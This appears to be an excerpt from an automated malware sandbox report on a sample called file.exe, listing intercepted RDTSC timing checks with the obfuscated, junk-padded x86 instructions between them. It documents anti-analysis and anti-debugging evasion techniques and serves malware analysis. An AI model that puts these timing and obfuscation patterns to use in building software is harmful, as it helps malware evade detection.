                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51207AC second address: 51207B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51207B2 second address: 51207F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F4FE915D6B0h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F4FE915D6B0h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51207F0 second address: 51207F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51207F4 second address: 5120811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510014F second address: 510015E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510015E second address: 5100225 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4FE915D6B1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F4FE915D6ACh 0x00000017 and si, DD98h 0x0000001c jmp 00007F4FE915D6ABh 0x00000021 popfd 0x00000022 call 00007F4FE915D6B8h 0x00000027 pushfd 0x00000028 jmp 00007F4FE915D6B2h 0x0000002d adc cx, 5F28h 0x00000032 jmp 00007F4FE915D6ABh 0x00000037 popfd 0x00000038 pop eax 0x00000039 popad 0x0000003a mov ebp, esp 0x0000003c pushad 0x0000003d movsx edx, cx 0x00000040 mov di, cx 0x00000043 popad 0x00000044 mov eax, dword ptr [ebp+08h] 0x00000047 pushad 0x00000048 pushfd 0x00000049 jmp 00007F4FE915D6B5h 0x0000004e jmp 00007F4FE915D6ABh 0x00000053 popfd 0x00000054 popad 0x00000055 and dword ptr [eax], 00000000h 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100225 second address: 5100240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0361 second address: 50E0370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0370 second address: 50E0376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0376 second address: 50E037A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0DB3 second address: 50F0DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C5Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0DC3 second address: 50F0DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0DD3 second address: 50F0DEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0DEB second address: 50F0DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0DF1 second address: 50F0DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120021 second address: 5120030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120030 second address: 512005F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 28B577FAh 0x00000008 call 00007F4FE9502C5Bh 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4FE9502C65h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51201CC second address: 512020F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FE915D6B7h 0x00000008 mov dh, ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d ret 0x0000000e nop 0x0000000f push eax 0x00000010 call 00007F4FED4ED89Bh 0x00000015 mov edi, edi 0x00000017 jmp 00007F4FE915D6ABh 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e mov ax, 81FBh 0x00000022 mov cx, 42D7h 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push eax 0x0000002c pop edx 0x0000002d mov cx, 4BE1h 0x00000031 popad 0x00000032 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0037 second address: 50D005A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D005A second address: 50D005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D005E second address: 50D0094 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4FE9502C64h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4FE9502C67h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0094 second address: 50D00BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, A1h 0x00000005 mov eax, 03FCCDF7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF8h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4FE915D6B9h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D00BF second address: 50D0123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F4FE9502C5Eh 0x0000000f push eax 0x00000010 jmp 00007F4FE9502C5Bh 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 mov bl, cl 0x00000019 pushfd 0x0000001a jmp 00007F4FE9502C61h 0x0000001f or si, 4A16h 0x00000024 jmp 00007F4FE9502C61h 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f mov edi, eax 0x00000031 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0123 second address: 50D0181 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4FE915D6B6h 0x00000008 jmp 00007F4FE915D6B5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dl, ah 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F4FE915D6AAh 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F4FE915D6B0h 0x0000001f mov ebx, dword ptr [ebp+10h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ebx, 6E635910h 0x0000002a mov dh, F6h 0x0000002c popad 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0181 second address: 50D0190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0190 second address: 50D0194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0194 second address: 50D019A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D019A second address: 50D01A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D01A0 second address: 50D0226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4FE9502C5Eh 0x00000015 xor ah, FFFFFFE8h 0x00000018 jmp 00007F4FE9502C5Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f mov dx, ax 0x00000022 pushfd 0x00000023 jmp 00007F4FE9502C62h 0x00000028 add eax, 140E6148h 0x0000002e jmp 00007F4FE9502C5Bh 0x00000033 popfd 0x00000034 popad 0x00000035 popad 0x00000036 mov esi, dword ptr [ebp+08h] 0x00000039 pushad 0x0000003a mov edx, eax 0x0000003c call 00007F4FE9502C60h 0x00000041 push esi 0x00000042 pop edi 0x00000043 pop eax 0x00000044 popad 0x00000045 push esp 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0226 second address: 50D022A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D022A second address: 50D022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D022E second address: 50D0234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0234 second address: 50D0262 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FE9502C67h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0262 second address: 50D0268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0268 second address: 50D026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D026C second address: 50D02D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e call 00007F4FE915D6B4h 0x00000013 push esi 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 pushfd 0x00000017 jmp 00007F4FE915D6B7h 0x0000001c and cl, 0000000Eh 0x0000001f jmp 00007F4FE915D6B9h 0x00000024 popfd 0x00000025 popad 0x00000026 je 00007F505B43B9EEh 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov edx, esi 0x00000031 popad 0x00000032 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D02D9 second address: 50D02EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C5Eh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D02EB second address: 50D0349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F4FE915D6B7h 0x00000014 je 00007F505B43B9C0h 0x0000001a jmp 00007F4FE915D6B6h 0x0000001f mov edx, dword ptr [esi+44h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4FE915D6B7h 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0349 second address: 50D0372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F4FE9502C66h 0x00000014 mov dx, si 0x00000017 popad 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0372 second address: 50D0378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0378 second address: 50D03F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 push ebx 0x00000013 call 00007F4FE9502C5Ah 0x00000018 pop eax 0x00000019 pop edi 0x0000001a popad 0x0000001b jne 00007F505B7E0F46h 0x00000021 pushad 0x00000022 movzx eax, bx 0x00000025 movsx edx, ax 0x00000028 popad 0x00000029 test byte ptr [esi+48h], 00000001h 0x0000002d jmp 00007F4FE9502C60h 0x00000032 jne 00007F505B7E0F3Dh 0x00000038 jmp 00007F4FE9502C60h 0x0000003d test bl, 00000007h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov dl, 3Fh 0x00000045 call 00007F4FE9502C66h 0x0000004a pop ecx 0x0000004b popad 0x0000004c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0942 second address: 50C0947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0947 second address: 50C094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C094D second address: 50C0951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0951 second address: 50C096E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4FE9502C5Ah 0x0000000f and esp, FFFFFFF8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C096E second address: 50C0972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0972 second address: 50C0978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0978 second address: 50C09A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b call 00007F4FE915D6AEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C09A2 second address: 50C09F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F4FE9502C61h 0x0000000b adc esi, 2D1085D6h 0x00000011 jmp 00007F4FE9502C61h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, 2799h 0x00000020 jmp 00007F4FE9502C66h 0x00000025 popad 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C09F1 second address: 50C09F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C09F7 second address: 50C09FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C09FB second address: 50C0A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A09 second address: 50C0A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, eax 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A10 second address: 50C0A15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A15 second address: 50C0A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F4FE9502C69h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e jmp 00007F4FE9502C5Ch 0x00000013 mov dword ptr [esp], esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx edx, cx 0x0000001c pushfd 0x0000001d jmp 00007F4FE9502C66h 0x00000022 or eax, 1A5BC248h 0x00000028 jmp 00007F4FE9502C5Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A76 second address: 50C0A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 75921BEAh 0x00000008 movsx ebx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A8D second address: 50C0A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A93 second address: 50C0AE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FE915D6ACh 0x00000009 adc si, E7D8h 0x0000000e jmp 00007F4FE915D6ABh 0x00000013 popfd 0x00000014 call 00007F4FE915D6B8h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebx, 00000000h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4FE915D6ADh 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0C9B second address: 50C0CB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0CB1 second address: 50C0CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0CB5 second address: 50C0CBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0CBB second address: 50C0CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6B9h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0CD8 second address: 50C0CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0CF6 second address: 50C0CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0CFA second address: 50C0D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0D00 second address: 50C0D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0D06 second address: 50C0D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0D0A second address: 50C0D75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F4FE915D6B6h 0x00000011 push dword ptr [ebp+14h] 0x00000014 jmp 00007F4FE915D6B0h 0x00000019 push dword ptr [ebp+10h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F4FE915D6ACh 0x00000025 adc cx, 3F68h 0x0000002a jmp 00007F4FE915D6ABh 0x0000002f popfd 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0DEC second address: 50C0E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, 8Eh 0x00000006 popad 0x00000007 mov cl, dl 0x00000009 popad 0x0000000a pop ebx 0x0000000b jmp 00007F4FE9502C5Ch 0x00000010 mov esp, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4FE9502C67h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0E1E second address: 50C0E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushfd 0x00000007 jmp 00007F4FE915D6B0h 0x0000000c and ecx, 36CC8678h 0x00000012 jmp 00007F4FE915D6ABh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0E51 second address: 50C0E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0E55 second address: 50C0E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0E5B second address: 50C0E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0E61 second address: 50C0E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D09E8 second address: 50D0A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C64h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0A00 second address: 50D0A26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007F4FE915D6AAh 0x0000001a pop esi 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514095F second address: 5140965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140965 second address: 5140969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
